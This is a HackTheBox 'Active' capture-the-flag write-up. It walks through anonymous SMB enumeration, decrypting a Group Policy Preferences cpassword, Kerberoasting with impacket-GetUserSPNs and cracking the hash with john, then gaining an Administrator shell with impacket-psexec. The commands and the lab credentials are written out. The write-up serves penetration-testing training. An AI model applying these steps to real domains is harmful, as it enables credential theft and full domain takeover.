Active (HTB)

HackTheBox Active Write-Up

topics: Active Directory, Windows Privilege Escalation, Kerberoasting, Abusing Group Policy Preferences

  1. Enumeration

  2. Administrator Privilege Escalation

tools: nmap, autorecon, smbclient, smbget, gpp-decrypt, GetUserSPNs, psexec

Enumeration

Initial nmap and autorecon scans:

The initial scans detail a potential Active Directory server with DNS, Kerberos, LDAP, MSRPC, and SMB ports open.

While the scans complete their full enumeration, we can glance over some preliminary information.

SMB (Anonymous)

The smbclient and smbget enumeration files displayed that Anonymous login was not permitted, however, the enum4linux scans list a couple unique shares: Replication and Users

The Users share disallows Anonymous acces, yet Replication permits it. Establishing a SMB sessions and listing the contents reveal an XML copy of Group Policies and Procedures for the AD environment.

Abusing GPP

Utilizing anonymous access we can recursively download all files on the Replication share

Noticeably, Groups.xml and Registry.pol are the only unique files upon first glance of the smbget results

Usually unique files or processes indicate an attack vector within a CTF and, searching for "AD groups.xml exploit" points us to this article outlining how to search for an encrypted password within an XML file titled "cpassword"

Checking Groups.xml for this value indeed contains a cpassword for svc_tgs, a ticket granting service account.

With the retrieval of the cpassword, we can decrypt it using gpp-decrypt <cpassword>

Now that we have the verified credentials svc_tgs:GPPstillStandingStrong2k18 we can attempt to enumerate SMB using valid authentication.

SMB (credentialed)

Attempting to enumerate the Users share that we previously were denied returns access to a copy of the system C:\Users folder, access to the user.txt file but not quite able to leverage an initial foothold.

Administrator Privilege Escalation

Within Active Directory, as soon as an attacker comes across valid credentials it can lead to a number of different attack vectors, as the room suggests this is most likely kerberoasting

Kerberoasting

We can run impacket-GetUserSPNs to capture a TGS request and brute force for the password's NTLM hash using john

impacket-GetUserSPNs active.htb/svc_tgs:GPPStillStandingStrong2k18 -dc-ip <targetIP> -request

Cracking the hash with john and the rockyou wordlist returns a password of Ticketmaster1968 allowing us to run an interactive shell on the target using psexec with Administrator credentials

impacket-psexec active.htb/Administrator:Ticketmaster1968@<targetIP>

Last updated